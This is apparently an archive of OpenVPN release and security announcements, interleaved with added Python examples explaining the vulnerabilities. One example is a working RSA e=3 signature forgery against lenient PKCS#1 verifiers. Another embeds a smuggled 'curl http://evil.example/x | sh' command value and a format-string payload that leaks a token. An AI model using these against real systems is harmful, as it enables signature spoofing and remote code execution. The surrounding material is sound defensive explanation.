James Yonan | 11 Dec 10:17

OpenVPN 2.1.0 released

I'm happy to announce the release of OpenVPN 2.1.0.  This release is 
basically 2.1_rc22 + some last-minute trivial fixes to documentation and 
plugin sample code.  Enjoy!

James

James Yonan | 12 Nov 11:04

OpenVPN 2.1_rc21 released

This release is to respond to the OpenSSL vulnerability CVE-2009-3555.

Some people have worried that the fix made to OpenSSL to address this
vulnerability (ban all SSL/TLS renegotiations) would break OpenVPN's
session renegotiation capability.  This is not the case.  OpenVPN does 
not rely on the session renegotiation capability that is built into 
SSL/TLS, and therefore if OpenVPN is linked against an OpenSSL library 
that disables SSL/TLS renegotiation, there should be no loss of 
functionality.

Changes:

2009.11.12 -- Version 2.1_rc21

* Rebuilt OpenVPN Windows installer with OpenSSL 0.9.8l to address
   CVE-2009-3555.  Note that OpenVPN has never relied on the session
   renegotiation capabilities that are built into the SSL/TLS protocol,
   therefore the fix in OpenSSL 0.9.8l (disable SSL/TLS renegotiation
   completely) will not adversely affect OpenVPN mid-session SSL/TLS
   renegotiation or any other OpenVPN capabilities.

* Added additional session renegotiation hardening.  OpenVPN has always
   required that mid-session renegotiations build up a new SSL/TLS
   session from scratch.  While the client certificate common name is
   already locked against changes in mid-session TLS renegotiations, we
   now extend this locking to the auth-user-pass username as well as all
   certificate content in the full client certificate chain.

James
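
Added illustration of the rc21 hardening described in the message above; it is not OpenVPN's own code. The identity presented at the first TLS handshake is pinned, and a mid-session renegotiation (which always builds a fresh TLS session) is refused if any pinned field differs. The old policy locked only the certificate common name; the new one also locks the auth-user-pass username and the content of the whole certificate chain. Class names, lock sets and certificate bytes are constructed for the demo.

```python
"""Added illustration (not OpenVPN's code) of the rc21 renegotiation
hardening: the identity seen at the first TLS handshake is pinned, and a
mid-session renegotiation that presents anything different is refused.
Names, lock sets and certificate bytes are constructed for the demo."""
import hashlib
from dataclasses import dataclass


def chain_fingerprints(chain):
    """SHA-256 of each DER certificate in the presented chain, leaf first.
    Pinning the whole chain catches a renegotiation that swaps in a
    different certificate carrying the same common name."""
    return tuple(hashlib.sha256(cert).hexdigest() for cert in chain)


@dataclass
class ClientIdentity:
    common_name: str
    username: str            # auth-user-pass username, "" if not used
    chain: tuple             # DER certificate bytes, leaf first

    def locked_view(self, lock):
        """The subset of the identity that a lock policy compares."""
        view = {}
        if "cn" in lock:
            view["cn"] = self.common_name
        if "username" in lock:
            view["username"] = self.username
        if "chain" in lock:
            view["chain"] = chain_fingerprints(self.chain)
        return view


LOCK_CN_ONLY = frozenset({"cn"})                      # behaviour before rc21
LOCK_FULL = frozenset({"cn", "username", "chain"})    # rc21 and later


class VpnSession:
    def __init__(self, lock=LOCK_FULL):
        self.lock = lock
        self.pinned = None

    def handshake(self, identity):
        """Initial TLS handshake: record what will be pinned."""
        self.pinned = identity.locked_view(self.lock)

    def renegotiate(self, identity):
        """A renegotiation builds a new TLS session from scratch; accept it
        only if every locked field matches the pinned value.  Returns
        (accepted, names of fields that changed)."""
        if self.pinned is None:
            raise RuntimeError("renegotiate() before handshake()")
        offered = identity.locked_view(self.lock)
        changed = sorted(k for k in self.pinned if self.pinned[k] != offered[k])
        return (not changed), changed


def demo():
    ca = b"constructed CA certificate"
    alice = ClientIdentity("alice", "alice", (b"constructed leaf cert for alice", ca))
    # Same common name, but another username and another leaf certificate.
    imposter = ClientIdentity("alice", "bob", (b"a different leaf cert", ca))

    old = VpnSession(LOCK_CN_ONLY)
    old.handshake(alice)
    new = VpnSession(LOCK_FULL)
    new.handshake(alice)
    return {
        "cn_only": old.renegotiate(imposter),   # accepted: CN unchanged
        "full": new.renegotiate(imposter),      # refused: chain and username differ
        "same_client": new.renegotiate(alice),  # accepted
    }


if __name__ == "__main__":
    for name, (ok, changed) in demo().items():
        print(f"{name:12s} accepted={ok} changed={changed}")
```

The interesting case is the CN-only policy accepting the imposter: a second certificate with the same common name, or the same certificate with a different username, passes the old check and fails the new one.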

James Yonan | 16 May 07:54

ANNOUNCEMENT: OpenVPN Access Server beta available

As the founder of the OpenVPN project, I'm proud to announce the first 
beta release of our new product, the OpenVPN Access Server.

With this product, we've taken years of feedback from the OpenVPN 
community and condensed it into a lightweight but powerful management 
application that we believe will dramatically simplify the effort 
required to configure and manage OpenVPN, while still enabling its most 
powerful features.

It's been an interesting voyage for me, having started this project 7 
years ago.  At that time, "easy-to-use VPN" had a very different meaning 
than it does today.  "easy-to-use" meant that you could get it running 
without having to recompile your kernel :)

Over the years of developing and supporting OpenVPN, I've realized that 
getting VPNs to work right is hard -- sometimes even harder than writing 
the actual VPN code.

I think the complexity arises from the fact that VPN administration 
combines 3 different areas of expertise -- (1) Public Key Infrastructure 
(PKI) and certificate management, (2) IP Networking, including routing 
and firewall management, and (3) authentication models such as LDAP and 
RADIUS.

To me, there was always a dilemma of sorts in how to address this 
complexity.  Should OpenVPN stay true to the open source ideal of narrow 
focus and simplicity, where each tool should try to do a single job 
well, or should OpenVPN take the integrated approach and try to tackle 
all the issues that make VPNs complex, such as authentication, 
routing/firewall management, certificate management, etc?  The narrow 
focus ideal makes for a powerful tool, but the need for our community to 
master PKI, routing, authentication, etc. in order to deploy a 
real-world VPN solution created a lot of stumbling blocks on the path to 
enlightenment.  My openvpn-users inbox has over 26,500 messages since 
the project was launched back in 2002 -- it's a great testament to the 
strength of the community that has grown up around OpenVPN, but also a 
warning sign as well:  many of these messages are calls for help that 
cite different variations of the same stumbling blocks.

So my answer to the dilemma of lean-and-focussed, vs. 
integrated-and-easy-to-use is this:  We will take both paths.  On the 
open source front, we will continue to maintain and extend OpenVPN as a 
world-class VPN engine.  We will be releasing a brand new open source 
Windows client shortly as a part of the 2.1 release, and we remain 
committed to maintaining, supporting, and extending OpenVPN as an open 
source project.

On the other hand, we intend to use our commercial arm (OpenVPN 
Technologies) to really raise the bar on what is possible with VPN 
technology in general, and especially to take advanced features of 
OpenVPN such as PKI/certificate-management, LDAP/RADIUS authentication, 
gateway redirection, automated generation of Windows clients, etc. and 
make these features easily accessible to anyone who can operate a web 
browser.

So without further fanfare, I invite each of you to test drive the 
OpenVPN Access Server:

http://beta.openvpn.net/index.php/access-server/download-openvpn-as.html

Let us know how you like it, what works, and what doesn't work.  Our aim 
is to create a universal VPN management application that covers all the 
bases.  Current features include:

* Web-based management with integrated Admin UI.

* Fully automated certificate/PKI management.

* RADIUS, LDAP, and PAM authentication are all supported.

* VPN users can log in via a web interface to download a dynamically 
generated, plug-and-play Windows installer, or just a client 
configuration file to use with the OpenVPN client of their choice.

* We've developed a new Windows client from scratch that uses the 
OpenVPN Management interface, and we plan to open source this component 
for the upcoming OpenVPN 2.1 release.

* The Access Server is just a front-end around the standard open source 
OpenVPN daemon, and all control occurs over the OpenVPN management 
interface.

* The Access Server is compatible with any OpenVPN 2.1 client.

* While the Access Server is a commercial product, and not open source, 
we will be open sourcing components of the product such as the new 
Windows client, and of course revenue from the product will help to 
sustain development and support of the OpenVPN core.

* The Access Server will be free for up to 2 concurrent connections, and 
inexpensive licenses will be available for additional concurrent 
connections (we're looking at pricing of $5/concurrent client which 
includes 1 year of access to our support center and software updates).

Below are the Release Notes for this release.  We hope you try out
the OpenVPN Access Server v1.1.0 and we look forward to receiving
your feedback.

Currently, we support the following Linux platforms for the Access 
Server.  We are in the process of expanding this list and will be 
supporting CentOS shortly:

   * 64-bit Fedora 8, 9, 10
   * 64-bit Ubuntu 8, 9

------------------------------------------------------------------
            OpenVPN Access Server v1.1.0b2 (beta 2)
                        RELEASE NOTES

Feedback and Support:
--------------------
We appreciate your feedback on this release. Register and login
at the Support Center to use the support ticketing system:

   http://beta.openvpn.net/index.php/access-server/support-center.html

New in Access Server v1.1.0:
---------------------------

Below are the main enhancements added since the Access Server v1.0.0
release:

-- Admin Web UI for configuration and management, including improved
    configuration options

-- Simplified CLI utility (ovpn-init) for initial configuration

-- Multi-profile support on Windows Client GUI

-- New method of authenticating via LDAP with enhanced configurability

Changes Since Access Server v1.1.0b:
-----------------------------------

The Access Server v1.1.0b2 contains these improvements since the
v1.1.0b release:

-- Better interoperation with installed OpenVPN open-source clients
    (installer no longer removes all TAP interfaces)

-- Corrected version numbering of the Windows Client, so that it
    properly detects an installed OpenVPN-AS v1.0.0 client.

-- Fix for an issue occasionally seen on Windows Client GUI where
    the TAP adapter cannot get an IP address due to a problem in DHCP
    handshaking between the TAP adapter and the Windows DHCP client.

-- Fix for an iptables issue that caused NAT forwarding to fail.

Installation:
------------

After installing the OpenVPN-AS package (e.g., using 'yum' on Fedora
platforms), run the initialization script:

/usr/local/openvpn_as/bin/ovpn-init

You will be prompted for initial settings for the Admin Web UI networking
and for authenticating the administrator. When ovpn-init completes, it
displays the URL to use for logging into the Admin Web UI to continue
configuring OpenVPN-AS.

License Keys:
------------

You can use the Admin UI after ovpn-init completes. However, to turn on
the VPN Server component of OpenVPN-AS, you must have an activated
license key. To get started, you can obtain a free, 5-concurrent-user
license by registering and logging in at the License Key page:

   http://beta.openvpn.net/index.php/access-server/license-key.html

Enter the license key into the "New License Key" box of the "License"
page in the Admin Web UI.

Known Issues:
------------

-- Accessing the Client Web Server without an activated license key
    yields an error message "error communicating with server agent".

-- Windows Client status display may remain at "Connecting TCP..."
    or "Connecting UDP..." when communication with VPN server fails.

-- Occasionally, when the Windows Client GUI attempts to connect to
    the VPN Server for the first time, the connection may stall at
    the "Connecting" stage and not complete.

-- Administrators should ensure that the VPN Server is not configured
    to run on the same (IP Address:port) combination as the Client Web
    Server or Admin UI.  Currently, the Admin UI does not flag this
    condition with an error, though it is an invalid configuration.

-- The PAM authentication module uses the 'sshd' PAM service, so the
    /etc/pam.d/sshd file must exist and be properly configured for
    user authentication.

-- The Ubuntu package does not configure the system so that the
    openvpnas service starts during system startup.

Best Regards,
James Yonan & the OpenVPN Technologies Team

James Yonan | 15 Sep 04:31

OpenVPN 2.1_rc11 released

This release fixes a serious (though not security-related) bug in the 
SSL/TLS negotiation over UDP that can cause SSL/TLS handshake failures.
The bug was introduced in 2.1_rc9.

All users of OpenVPN 2.1_rc9 and rc10 are urged to upgrade.

Change log:

2008.09.14 -- Version 2.1_rc11

* Fixed a bug that can cause SSL/TLS negotiations in UDP mode
   to fail if UDP packets are dropped.

James

James Yonan | 1 Aug 08:41

OpenVPN 2.1_rc9 released -- note security fix

Download:

http://openvpn.net/download.html

2008.07.31 -- Version 2.1_rc9

* Security Fix -- affects non-Windows OpenVPN clients running
   OpenVPN 2.1-beta14 through 2.1-rc8 (OpenVPN 2.0.x clients are NOT
   vulnerable nor are any versions of the OpenVPN server vulnerable).
   An OpenVPN client connecting to a malicious or compromised
   server could potentially receive an "lladdr" or "iproute"
   configuration directive from the server which could cause arbitrary
   code execution on the client. A successful attack requires that (a)
   the client has agreed to allow the server to push configuration
   directives to it by including "pull" or the macro "client" in its
   configuration file, (b) the client successfully authenticates the
   server, (c) the server is malicious or has been compromised and is
   under the control of the attacker, and (d) the client is running a
   non-Windows OS.  Credit: David Wagner.

* Miscellaneous defensive programming changes to multiple
   areas of the code.  In particular, use of the system() call
   for calling executables such as ifconfig, route, and
   user-defined scripts has been completely revamped in favor
   of execve() on unix and CreateProcess() on Windows.

* In Windows build, package a statically linked openssl.exe to work
   around observed instabilities in the dynamic build since the
   migration to OpenSSL 0.9.8h.

James

James Yonan | 15 May 18:27

OpenSSL vulnerability on Debian-based systems CVE-2008-0166

OpenSSL 0.9.8c-1 up to 0.9.8g-9 on Debian-based operating systems uses a 
random number generator that generates predictable numbers, which makes 
it easier for remote attackers to conduct brute force guessing attacks 
against cryptographic keys.   This vulnerability only affects 
Debian-based distributions and does not affect any Red Hat distributions.

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-0166

How this affects OpenVPN:

Any keys which were generated on the vulnerable distributions (Debian, 
Ubuntu, Kubuntu) using openvpn --genkey or the easy-rsa scripts should 
be considered compromised, since the security of each of these 
operations would depend on the quality of the randomness provided by the 
underlying OpenSSL library.  You would want to revoke these keys, and 
rebuild them after having applied the fix.

James
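
Added example, not part of the announcement above: a check that flags RSA keys produced by the broken Debian OpenSSL PRNG (CVE-2008-0166) so they can be revoked and regenerated. It follows the openssl-blacklist approach of hashing the modulus as `openssl rsa -noout -modulus` prints it and looking the hash up in a list of known-weak fingerprints. The exact fingerprint convention used here (SHA-1 over "Modulus=<HEX>\n", keeping the last 20 hex digits) is my recollection of that package's layout and should be treated as an assumption; the blacklist and moduli in the block are constructed, not real weak-key data.

```python
"""Added example, not part of the announcement: flag RSA keys made by the
broken Debian OpenSSL PRNG (CVE-2008-0166) so they can be revoked.
Fingerprint layout is an assumption (openssl-blacklist style); the
blacklist and moduli below are constructed demo data."""
import hashlib
import re
import subprocess

MODULUS_RE = re.compile(r"^Modulus=([0-9A-Fa-f]+)$")


def weak_key_fingerprint(modulus_hex):
    """Assumed convention: SHA-1 of 'Modulus=<HEX>\\n', last 20 hex digits."""
    line = f"Modulus={modulus_hex.upper()}\n".encode()
    return hashlib.sha1(line).hexdigest()[-20:]


def load_blacklist(lines):
    """One fingerprint per line; '#' starts a comment; blank lines ignored."""
    fps = set()
    for ln in lines:
        ln = ln.split("#", 1)[0].strip()
        if ln:
            fps.add(ln.lower())
    return fps


def is_blacklisted(modulus_hex, blacklist):
    return weak_key_fingerprint(modulus_hex) in blacklist


def modulus_of_key(path):
    """Hex modulus of a PEM RSA key via the real openssl CLI (not run in the demo).
    For a certificate, swap 'rsa' for 'x509'."""
    out = subprocess.run(["openssl", "rsa", "-noout", "-modulus", "-in", path],
                         check=True, capture_output=True, text=True).stdout
    m = MODULUS_RE.match(out.strip())
    if not m:
        raise ValueError(f"unexpected openssl output for {path}: {out!r}")
    return m.group(1)


def audit(paths, blacklist):
    """Map each key file to True (weak, revoke it) or False (not listed)."""
    return {p: is_blacklisted(modulus_of_key(p), blacklist) for p in paths}


# Constructed demo data: one modulus we declare weak, one we do not.
WEAK_MODULUS = "C0FFEE" * 40
GOOD_MODULUS = "DEADBEEF" * 30
DEMO_BLACKLIST = [
    "# constructed blacklist, same one-fingerprint-per-line layout",
    weak_key_fingerprint(WEAK_MODULUS),
    "0123456789abcdef0123   # filler entry",
]


def demo():
    bl = load_blacklist(DEMO_BLACKLIST)
    return {"weak": is_blacklisted(WEAK_MODULUS, bl),
            "good": is_blacklisted(GOOD_MODULUS, bl)}


if __name__ == "__main__":
    print(demo())
```

A blacklist only covers RSA key pairs. The static key that `openvpn --genkey` writes has no modulus to fingerprint, so one made on an affected machine in the vulnerable window has to be regenerated unconditionally, and anything signed by a weak CA key needs reissuing even if the leaf keys are clean.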

James Yonan | 1 Oct 15:02

OpenVPN 2.0.9 and 2.1-beta16 released

2006.10.01 -- Version 2.0.9

* Windows installer updated with OpenSSL 0.9.7l DLLs to fix
  published vulnerabilities.

* Fixed TAP-Win32 bug that caused BSOD on Windows Vista
  (Henry Nestler).  The TAP-Win32 driver has now been
  upgraded to version 8.4.

2006.10.01 -- Version 2.1-beta16

* Windows installer updated with OpenSSL 0.9.7l DLLs to fix
  published vulnerabilities.

* Fixed TAP-Win32 bug that caused BSOD on Windows Vista
  (Henry Nestler).

* Autodetect 32/64 bit Windows in installer and install
  appropriate TAP driver (Mathias Sundman, Hypherion).

* Fixed bug in loopback self-test introduced
  in 2.1-beta15 where self test as invoked by
  "make check" would not properly exit after
  2 minutes (Paul Howarth).

James

James Yonan | 12 Sep 10:17

OpenVPN 2.0.8 and 2.1_beta15 released

2006.09.12 -- Version 2.0.8

* Windows installer updated with OpenSSL 0.9.7k DLLs to fix
  RSA Signature Forgery (CVE-2006-4339).

* No changes to OpenVPN source code between 2.0.7 and 2.0.8.

2006.09.12 -- Version 2.1-beta15

* Windows installer updated with OpenSSL 0.9.7k DLLs to fix
  RSA Signature Forgery (CVE-2006-4339).

* Fixed bug introduced with the --port-share directive
  (back in 2.1-beta9) which causes TLS soft resets
  (1 per hour by default) in TCP server mode to force
  a blockage of tunnel packets and later time-out and
  restart the connection.

* pkcs11 changes:
  1. Modified ssl.c to not FATAL and return to init.c
     so auth-retry will work.
  2. Modified pkcs11-helper.c to fix some problem with
     multiple providers.
  3. Updated makefile.w32-vc to include lladdr.*, updated
     linkage libraries.
  4. Modified lladdr.c to be compiled under visual C.
  5. Added retry counter to PKCS#11 PIN hook.
  6. Modified PKCS#11 PIN retry loop to return correct error
     code when PIN is incorrect.
  7. Fix handling (ignoring) zero sized attributes.
  8. Fix gcc-2 issues.
  9. Fix openssl 0.9.6 (first version) issues.
  10. easy-rsa Makefile (install) is now available so that
      distribs will be able to install it safely.

* Added two new management states:
   OPENVPN_STATE_RESOLVE      -- DNS lookup
   OPENVPN_STATE_TCP_CONNECT  -- Connecting to TCP server

* Echo management state change to log.

* Minor syshead.h change for NetBSD to allow
  TCP_NODELAY flag to work.

* Modified --port-share code to remove the assumption that
  CMSG_SPACE always evaluates to a constant, to enable
  compilation on NetBSD and possibly other BSDs as well.

* Eliminated gcc 3.3.3 warnings on NetBSD
  when ./configure --enable-strict is used.

* Added optional minimum-number-of-bytes parameter
  to --inactive directive.

James
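
Added illustration of the bug class behind the CVE-2006-4339 fix in the 2.0.8 and 2.1-beta15 installers above; it is neither OpenSSL nor OpenVPN code. A PKCS#1 v1.5 verifier that stops once it has matched the DigestInfo, ignoring whatever follows, can be fooled for a public exponent of 3 without the private key: lay out the block you want, leave free space at the end, and take the integer cube root. The modulus below is just an odd 2048-bit number, constructed for the demo, because the forged value is never reduced modulo n; against a real CA with an e=3 key (which `openssl genrsa -3` produces) the same forgery works.

```python
"""Added illustration of the CVE-2006-4339 bug class (not OpenSSL or
OpenVPN code).  The modulus is a constructed stand-in; the SHA-1
DigestInfo prefix is the standard DER constant from PKCS#1."""
import hashlib

E = 3
K = 256                               # modulus size in bytes (2048 bits)
N = (1 << 2047) | 1                   # constructed; s**3 < N so no reduction happens
SHA1_DIGESTINFO = bytes.fromhex("3021300906052b0e03021a05000414")


def digest_info(message):
    return SHA1_DIGESTINFO + hashlib.sha1(message).digest()


def icbrt(n):
    """Floor of the integer cube root (Newton iteration on ints)."""
    if n < 2:
        return n
    x = 1 << ((n.bit_length() + 2) // 3)        # starting point >= cbrt(n)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y


def strip_padding(em):
    """Parse 00 01 FF..FF 00 and return what follows it, or None."""
    if len(em) != K or em[0] != 0x00 or em[1] != 0x01:
        return None
    i = 2
    while i < K and em[i] == 0xFF:
        i += 1
    if i < 10 or i >= K or em[i] != 0x00:        # padding string must be >= 8 bytes
        return None
    return em[i + 1:]


def check_em(em, message, strict):
    """strict=False is the buggy check: DigestInfo present, the rest ignored.
    strict=True is the fix: DigestInfo must be the last thing in the block."""
    rest = strip_padding(em)
    if rest is None:
        return False
    di = digest_info(message)
    return rest == di if strict else rest.startswith(di)


def verify(sig, message, strict):
    return check_em(pow(sig, E, N).to_bytes(K, "big"), message, strict)


def forge(message):
    """Build 00 01 FF*8 00 DigestInfo followed by 210 bytes of free space
    and take the ceiling cube root.  s**3 overshoots the target by less
    than 3*s**2 (about 2**1360), which fits inside the 1680-bit free
    space, so the prefix survives and a lenient verifier accepts s."""
    prefix = b"\x00\x01" + b"\xff" * 8 + b"\x00" + digest_info(message)
    target = int.from_bytes(prefix.ljust(K, b"\x00"), "big")
    s = icbrt(target)
    if s ** 3 < target:
        s += 1
    assert (s ** 3).to_bytes(K, "big").startswith(prefix)
    return s


if __name__ == "__main__":
    msg = b"constructed message to forge a signature over"
    s = forge(msg)
    print("lenient verifier accepts forgery:", verify(s, msg, strict=False))
    print("strict verifier accepts forgery: ", verify(s, msg, strict=True))
```

The fix is the single comparison in `check_em`: the parsed DigestInfo has to consume the whole remainder of the block. Preferring e=65537 over e=3 for CA keys removes the cheap cube-root route as well, but does not excuse a lenient parser.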

James Yonan | 12 Apr 12:04

OpenVPN 2.0.7 and 2.1-beta13 released

* Code added in 2.1-beta7 and 2.0.6-rc1 to extend byte counters
  to 64 bits caused a bug in the Windows version which has now
  been fixed.  The bug could cause intermittent crashes.

James

James Yonan | 1 Nov 21:17

OpenVPN 2.0.4 Released -- Note security fixes

This release contains fixes for two security issues that just came to my
attention over the past 24 hours, which affect OpenVPN 2.0, 2.0.1, 2.0.2,
and the 2.1 beta series.  OpenVPN 1.x is not affected.

Individual patches are available here:

http://openvpn.net/patch/2.0.4-security-patches

Change Log:

* Security fix -- Affects non-Windows OpenVPN clients of
  version 2.0 or higher which connect to a malicious or
  compromised server.  A format string vulnerability
  in the foreign_option function in options.c could
  potentially allow a malicious or compromised server
  to execute arbitrary code on the client.  Only
  non-Windows clients are affected.  The vulnerability
  only exists if (a) the client's TLS negotiation with
  the server succeeds, (b) the server is malicious or
  has been compromised such that it is configured to
  push a maliciously crafted options string to the client,
  and (c) the client indicates its willingness to accept
  pushed options from the server by having "pull" or
  "client" in its configuration file (Credit: Vade79).
  CVE-2005-3393
* Security fix -- Potential DoS vulnerability on the
  server in TCP mode.  If the TCP server accept() call
  returns an error status, the resulting exception handler
  may attempt to indirect through a NULL pointer, causing
  a segfault.  Affects all OpenVPN 2.0 versions.
  CVE-2005-3409
* Fix attempt of assertion at multi.c:1586 (note that
  this precise line number will vary across different
  versions of OpenVPN).
* Added ".PHONY: plugin" to Makefile.am to work around
  "make dist" issue.
* Fixed double fork issue that occurs when --management-hold
  is used.
* Moved TUN/TAP read/write log messages from --verb 8 to 6.
* Warn when multiple clients having the same common name or
  username usurp each other when --duplicate-cn is not used.
* Modified Windows and Linux versions of get_default_gateway
  to return the route with the smallest metric
  if multiple 0.0.0.0/0.0.0.0 entries are present.

James
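
Added example, not OpenVPN code, serving both the 2.1_rc9 advisory (a pushed "lladdr" or "iproute" value reaching a command built for system(), fixed upstream by moving to execve()) and the 2.0.4 advisory above (a pushed option reaching a format string, CVE-2005-3393). It shows each bug beside the hardened handling: an allow-list of directives a pulling client will accept, a strict grammar for each value, an argv list instead of a shell command line, and a constant format string for logging. The allow-list and value grammars are simplified assumptions for the demo rather than OpenVPN's real set, and Python's str.format stands in for printf in the format-string half.

```python
"""Added example, not OpenVPN code: pushed-option handling, vulnerable
and hardened.  Allow-list and grammars are constructed assumptions."""
import ipaddress


def _bad(directive, value):
    raise ValueError(f"{directive}: rejected value {value!r}")


def _addrs(directive, value, lo, hi):
    """lo..hi whitespace-separated IPv4 addresses; anything else raises."""
    parts = value.split()
    if not lo <= len(parts) <= hi:
        _bad(directive, value)
    return tuple(str(ipaddress.IPv4Address(p)) for p in parts)


def _dhcp_option(value):
    parts = value.split()
    if len(parts) == 2 and parts[0] in ("DNS", "WINS"):
        return (parts[0], str(ipaddress.IPv4Address(parts[1])))
    return _bad("dhcp-option", value)


# Constructed allow-list of directives a pulling client accepts.  Anything
# that names or parameterises an executable (lladdr and iproute in the rc9
# advisory) is deliberately absent, so such a push is refused outright.
PUSHABLE = {
    "ifconfig": lambda v: _addrs("ifconfig", v, 2, 2),
    "route": lambda v: _addrs("route", v, 2, 3),
    "ping": lambda v: (int(v),) if v.isdigit() else _bad("ping", v),
    "dhcp-option": _dhcp_option,
}


def parse_pushed(line):
    """Validate one 'directive value' line of a PUSH_REPLY, or raise."""
    directive, _, value = line.strip().partition(" ")
    if directive not in PUSHABLE:
        raise ValueError(f"directive {directive!r} may not be pushed")
    return directive, PUSHABLE[directive](value.strip())


def ifconfig_via_shell(dev, local, remote):
    """Pre-rc9 pattern: one string for system().  An unvalidated value can
    smuggle a second command after ';'."""
    return f"ifconfig {dev} {local} pointopoint {remote}"


def ifconfig_argv(dev, local, remote):
    """Post-rc9 pattern: argv for execve(); no shell parses it, so each
    value stays one argument whatever it contains."""
    return ["ifconfig", dev, local, "pointopoint", remote]


class ClientState:
    def __init__(self):
        self.auth_token = "constructed-secret-token"   # something worth leaking


def log_foreign_option_vulnerable(option, state):
    """CVE-2005-3393 analogue: the pushed text becomes the format string,
    so '{0.auth_token}' inside a pushed option reads client memory."""
    return ("foreign option: " + option).format(state)


def log_foreign_option_fixed(option, state):
    """Fix: a constant format string; the pushed text is only ever data."""
    return "foreign option: {}".format(option)


def demo():
    state = ClientState()
    evil_option = "dhcp-option DNS {0.auth_token}"
    injected = "10.8.0.1; curl http://evil.example/x | sh"
    out = {
        "vuln_log": log_foreign_option_vulnerable(evil_option, state),
        "fixed_log": log_foreign_option_fixed(evil_option, state),
        "shell_cmd": ifconfig_via_shell("tun0", "10.8.0.2", injected),
        "argv": ifconfig_argv("tun0", "10.8.0.2", injected),
        "good": parse_pushed("ifconfig 10.8.0.2 10.8.0.1"),
    }
    for name, line in (("injected_rejected", "ifconfig 10.8.0.2 " + injected),
                       ("lladdr_rejected", "lladdr 00:11:22:33:44:55")):
        try:
            parse_pushed(line)
            out[name] = False
        except ValueError:
            out[name] = True
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:18s} {v!r}")
```

Both advisories share the same precondition: the client must have "pull" or "client" in its configuration, so a client that does not pull is not exposed. The allow-list is the first line of defence; the argv and constant-format changes are the second, for values that are accepted but still untrusted.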

James Yonan | 25 Aug 19:20

OpenVPN 2.0.2 released

Download:

http://openvpn.net/download.html

Changes since 2.0.1:

* Fixed regression bug in Win32 installer, introduced in 2.0.1,
  which incorrectly set OpenVPN service to autostart.
* Don't package source code zip file in Windows installer
  in order to reduce the size of the installer.  The source
  zip file can always be downloaded separately if needed.
* Fixed bug in route.c in FreeBSD, Darwin, OpenBSD and NetBSD
  version of get_default_gateway.  Allocated socket for route
  manipulation is never freed so number of mbufs continuously
  grow and exhaust system resources after a while (Jaroslav Klaus).
* Fixed bug where "--proto tcp-server --mode p2p --management
  host port" would cause the management port to not respond until
  the OpenVPN peer connects.
* Modified pkitool script to be /bin/sh compatible (Johnny Lam).

James
